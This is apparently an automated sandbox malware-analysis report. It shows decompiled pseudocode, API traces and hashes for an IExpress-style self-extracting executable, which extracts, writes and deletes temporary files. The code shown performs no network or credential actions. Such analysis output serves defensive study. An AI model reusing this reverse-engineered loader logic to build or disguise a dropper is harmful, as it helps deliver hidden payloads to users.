Part of subcall function 0093468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009346C3
Part of subcall function 0093468F: LoadResource.KERNEL32(00000000,00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346CC
Part of subcall function 0093468F: LockResource.KERNEL32(00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346D3
Part of subcall function 0093468F: memcpy_s.MSVCRT ref: 009346E5
Part of subcall function 0093468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009346EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00932F4D,?,00000002,00000000), ref: 00935201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00935250

Part of subcall function 009344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00934518
Part of subcall function 009344B9: MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00934554

Part of subcall function 00936285: GetLastError.KERNEL32(00935BBC), ref: 00936285

Strings

UPROMPT, xrefs: 009351EF, 00935230
<None>, xrefs: 00935262

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: 0223a4cdf5332dda1696e9227eb9cfe596f2d53c39d615e23b3090bd4b592c31
Instruction ID: bef33f803da915cc158506af0080e055459b75089c752c65c2ff8c21485c9715
Opcode Fuzzy Hash: 0223a4cdf5332dda1696e9227eb9cfe596f2d53c39d615e23b3090bd4b592c31
Instruction Fuzzy Hash: 6111C4B1218601AFE3246BB15C4AF3B61DDDBCD384F124429F692E61A0DABDDC016E25

Uniqueness

Uniqueness Score: -1.00%

Function 009352B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E009352B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x938004; // 0x911e09f9
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x9391e0; // 0x35182e0
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x938a24 == 0 &&  *0x939a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x938a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x938a24 == 0 &&  *0x939a30 == 0) {
					_push(_t22);
					E00931781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
					if(( *0x939a34 & 0x00000020) != 0) {
						E009365E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00932390( &_v268);
					_t11 =  *0x938a20; // 0x0
				}
				if( *0x939a40 != 1 && _t11 != 0) {
					_t11 = E00931FE1(_t22);
				}
				 *0x938a20 =  *0x938a20 & 0x00000000;
				return E00936CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x009352b6
0x009352b6
0x009352b6
0x009352c1
0x009352c8
0x009352cb
0x009352cc
0x009352d4
0x009352d6
0x009352d7
0x009352de
0x009352e0
0x009352f2
0x009352fa
0x009352fa
0x00935302
0x00935305
0x0093530c
0x00935312
0x00935316
0x00935316
0x00935317
0x0093531c
0x0093531f
0x00935333
0x00935345
0x00935351
0x00935359
0x00935359
0x00935363
0x00935369
0x0093536f
0x00935374
0x00935374
0x00935381
0x00935387
0x00935387
0x0093538f
0x009353a0

APIs

SetFileAttributesA.KERNELBASE(035182E0,00000080,?,00000000), ref: 009352F2
DeleteFileA.KERNELBASE(035182E0), ref: 009352FA
LocalFree.KERNEL32(035182E0,?,00000000), ref: 00935305
LocalFree.KERNEL32(035182E0), ref: 0093530C
SetCurrentDirectoryA.KERNELBASE(009311FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00935363

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00935334

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 2833751637-1193786559
Opcode ID: 5c610acac3b7963b507c2c6f1b36e48e96223a6be779fac14054df3f8b1b3429
Instruction ID: b1fddd415874592a1afee3b825fe374235bfa6c29aadc0c664229573e1ba3d48
Opcode Fuzzy Hash: 5c610acac3b7963b507c2c6f1b36e48e96223a6be779fac14054df3f8b1b3429
Instruction Fuzzy Hash: AB21C031928604DBDB24AB20ED49BAA77B8FB58750F050259F882931B0CFF09D84EF81

Uniqueness

Uniqueness Score: -1.00%

Function 00934CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00934CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x938004; // 0x911e09f9
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x9391d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00934E99(_t75);
						L35:
						return E00936CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x938584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x9391e4;
						_t58 = 0x9391e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x9391e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x9391e4;
						_t30 = E00934702( &_v268, 0x9391e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0093476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00934980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E009347E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x9393f4 =  *0x9393f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x9391e4;
						_t63 = 0x9391e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x9391e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x9391e4;
						_t30 = E00934702( &_v268, 0x9391e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00934C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00934B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00934B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x00934cd0
0x00934cdb
0x00934ce0
0x00934ce2
0x00934cee
0x00934cf2
0x00934d0e
0x00934d0e
0x00934d11
0x00934e83
0x00934e88
0x00934e98
0x00934e98
0x00934d17
0x00934d17
0x00934d1a
0x00934d2f
0x00934d2f
0x00000000
0x00934d2f
0x00934d1c
0x00934d1c
0x00934d1f
0x00934dcb
0x00934dd0
0x00934dd2
0x00934ddd
0x00934ddd
0x00934de3
0x00934de8
0x00934ded
0x00934ded
0x00934def
0x00934df0
0x00934df0
0x00934df4
0x00934df4
0x00934df6
0x00934df9
0x00934dfc
0x00934dfc
0x00934dfe
0x00934dff
0x00934dff
0x00934e03
0x00934e08
0x00934e0a
0x00934e0f
0x00934d03
0x00934d03
0x00000000
0x00934d03
0x00934e18
0x00934e20
0x00934e25
0x00934e27
0x00000000
0x00000000
0x00934e33
0x00934e38
0x00934e3a
0x00000000
0x00000000
0x00934e40
0x00934e51
0x00934e56
0x00934e5b
0x00934e5e
0x00000000
0x00000000
0x00934e6a
0x00934e6f
0x00934e71
0x00000000
0x00000000
0x00934e77
0x00934e7d
0x00000000
0x00934e7d
0x00934d25
0x00934d25
0x00934d28
0x00934d36
0x00934d3b
0x00934d40
0x00934d40
0x00934d42
0x00934d43
0x00934d43
0x00934d47
0x00934d4a
0x00934d4a
0x00934d4c
0x00934d4f
0x00934d4f
0x00934d51
0x00934d52
0x00934d52
0x00934d56
0x00934d5b
0x00934d5d
0x00934d62
0x00000000
0x00000000
0x00934d67
0x00934d6f
0x00934d74
0x00934d76
0x00000000
0x00000000
0x00934d7c
0x00934d84
0x00934d89
0x00934d8b
0x00000000
0x00000000
0x00934d94
0x00934d99
0x00934d9e
0x00934da1
0x00934daa
0x00934daa
0x00934da3
0x00934da3
0x00934da3
0x00934db5
0x00934dbb
0x00934dbd
0x00000000
0x00934dc3
0x00934dc5
0x00000000
0x00934dc5
0x00934dbd
0x00934d2a
0x00934d2a
0x00934d2d
0x00000000
0x00000000
0x00000000
0x00934d2d
0x00934cf8
0x00934cfd
0x00934d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00934DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00934DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00934D36, 00934DE3

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 3625706803-1193786559
Opcode ID: d1cecc67e59fae0d2b67087a5a6faec38600dffa054aa98f0e3480314cab8e16
Instruction ID: 0b0b8c1bebed8569d3e90eb757ce7c450db3d6e1e28840119dff5f31aff55132
Opcode Fuzzy Hash: d1cecc67e59fae0d2b67087a5a6faec38600dffa054aa98f0e3480314cab8e16
Instruction Fuzzy Hash: EC41F4362042019BCB359F28DD447BA73A9FB85700F064668E8A2976D5DB31FE86DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00934C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00934C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x938d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x938d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x00934c40
0x00934c4a
0x00934c8d
0x00000000
0x00934c70
0x00934c70
0x00934c7e
0x00934c86
0x00000000
0x00000000
0x00000000
0x00934c8a

APIs

DosDateTimeToFileTime.KERNEL32 ref: 00934C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00934C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 00934C7E

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: 8d1fe99f3662bd20fca32b330231a9c95e33e0846669cfa3c17af12310743af1
Instruction ID: 98caf5ad918cfab7a012d4ef5a993f18c00b0de9c2ac3b6722d14834ffa22077
Opcode Fuzzy Hash: 8d1fe99f3662bd20fca32b330231a9c95e33e0846669cfa3c17af12310743af1
Instruction Fuzzy Hash: 6BF0907261520CAF9B24DFB4CC48DFB77ACEB14240F44052AB895C1050EA30ED14DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0093487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0093487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0093490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x00934880
0x0093488c
0x00934894
0x009348a0
0x009348c9
0x009348ce
0x009348a2
0x009348a8
0x009348b7
0x009348bc
0x009348aa
0x009348ac
0x009348ac
0x009348a8
0x009348de
0x009348e7
0x0093490b
0x009348ee
0x009348f0
0x00000000
0x00934902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00934A23,?,00934F67,*MEMCAB,00008000,00000180), ref: 009348DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00934F67,*MEMCAB,00008000,00000180), ref: 00934902

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 16a52f3f89b287699742b1981582815c926c8e63cbd9da01e8e02dd55b5cf5bc
Instruction ID: cd8e7809e9a1ec7341fd96ceb1d73a745158276eab8464d14cf47de263a092ff
Opcode Fuzzy Hash: 16a52f3f89b287699742b1981582815c926c8e63cbd9da01e8e02dd55b5cf5bc
Instruction Fuzzy Hash: 32016DA3E1557026F32480294C88FB7551CCBD6B34F1B0734BDEAE71D1D5646C0485E0

Uniqueness

Uniqueness Score: -1.00%

Function 00934AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00934AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x93858c; // 0x278
				_t9 = E00933680(_t20);
				if( *0x9391d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x938d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x939400; // 0x66236
							_t15 = _t14 + _t25;
							 *0x939400 = _t15;
							if( *0x938184 != 0) {
								_t21 =  *0x938584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x9393f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x00934ad5
0x00934adb
0x00934ae7
0x00934aee
0x00934b05
0x00934b0d
0x00934b14
0x00934b1a
0x00934b1c
0x00934b21
0x00934b2a
0x00934b2f
0x00934b31
0x00934b39
0x00934b54
0x00934b54
0x00934b39
0x00934b2f
0x00934b0f
0x00934b0f
0x00934b0f
0x00934b5e
0x00934ae9
0x00934aed
0x00934aed

APIs

Part of subcall function 00933680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0093369F
Part of subcall function 00933680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009336B2
Part of subcall function 00933680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009336DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00934B05

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: a64d642f40bcea53e7dea8439297736b0555b1b6f81faa469a70740be7d7b8bc
Instruction ID: 96bddfa57f81896c15e22a0c6803d14049898dfe76fc30794094fc44ada04c6a
Opcode Fuzzy Hash: a64d642f40bcea53e7dea8439297736b0555b1b6f81faa469a70740be7d7b8bc
Instruction Fuzzy Hash: 1A01B131214301ABDB148F68DC0ABA6B769FB44725F058265F9399B1F0CBB0EC12EF80

Uniqueness

Uniqueness Score: -1.00%

Function 0093658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0093658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x938b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x938b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E009316B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x00936592
0x00936594
0x00936596
0x00936598
0x00936598
0x0093659b
0x0093659b
0x0093659d
0x0093659e
0x009365a2
0x009365a4
0x009365a9
0x009365b2
0x009365b6
0x009365ba
0x009365c3
0x009365c5
0x009365c8
0x009365c8
0x009365c3
0x009365c9
0x009365cc
0x009365d2
0x009365d1
0x009365d1
0x00000000
0x009365dc
0x00000000

APIs

CharPrevA.USER32(00938B3E,00938B3F,00000001,00938B3E,-00000003,?,009360EC,00931140,?), ref: 009365BA

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: f741cdf04b5eff12cfef7501fbe573bcf0631a89ed6e606cc69ba69bc336e249
Instruction ID: 862aeea47c9a37b1fec78781b6445378e428a43590d937788e23c84f4220a226
Opcode Fuzzy Hash: f741cdf04b5eff12cfef7501fbe573bcf0631a89ed6e606cc69ba69bc336e249
Instruction Fuzzy Hash: C1F04C32108250BBD331091D9884BA6BFDE9BC6350F28857EF8DAC3205CA659C45DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0093621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0093621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x938004; // 0x911e09f9
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E0093597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E009344B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x939124 = E00936285();
					_t9 = 0;
				}
				return E00936CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x00936229
0x00936230
0x00936247
0x0093626a
0x00936272
0x00936249
0x00936255
0x0093625f
0x00936264
0x00936264
0x00936284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0093623F

Part of subcall function 009344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00934518
Part of subcall function 009344B9: MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00934554

Part of subcall function 00936285: GetLastError.KERNEL32(00935BBC), ref: 00936285

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: 4f9ec1fb623cec36d263db541359e130b9ea126f00588c44bc30f9cc0251d2c4
Instruction ID: 8126e8674e9e5a5dc9ab49899d8e93bf1841d3f2dfa7727b8075fb956103ee5b
Opcode Fuzzy Hash: 4f9ec1fb623cec36d263db541359e130b9ea126f00588c44bc30f9cc0251d2c4
Instruction Fuzzy Hash: E7F0E2B0708208BBE750EB748D06FBF37ECDB94300F41446AB9C6D6092EEB49D449E50

Uniqueness

Uniqueness Score: -1.00%

Function 00934B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00934B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x938d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x938d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x938d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x938d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x938d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x938d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x938d6c)) = 0;
				return 0;
			}

0x00934b66
0x00934b74
0x00934b98
0x00934ba0
0x00000000
0x00934bac
0x00934ba4
0x00000000
0x00934ba4
0x00934b78
0x00934b7e
0x00934b84
0x00934b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00934FA1,00000000), ref: 00934B98

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: c7501aa468a7df482ae382cff38e2fa08fa04a8ac2c26c7e1bf5d0fcd98b1240
Instruction ID: c5555cdffe4bbb9c5b918b1d3bdd261256fa6e0a78b385cf4ae3b8646e72a159
Opcode Fuzzy Hash: c7501aa468a7df482ae382cff38e2fa08fa04a8ac2c26c7e1bf5d0fcd98b1240
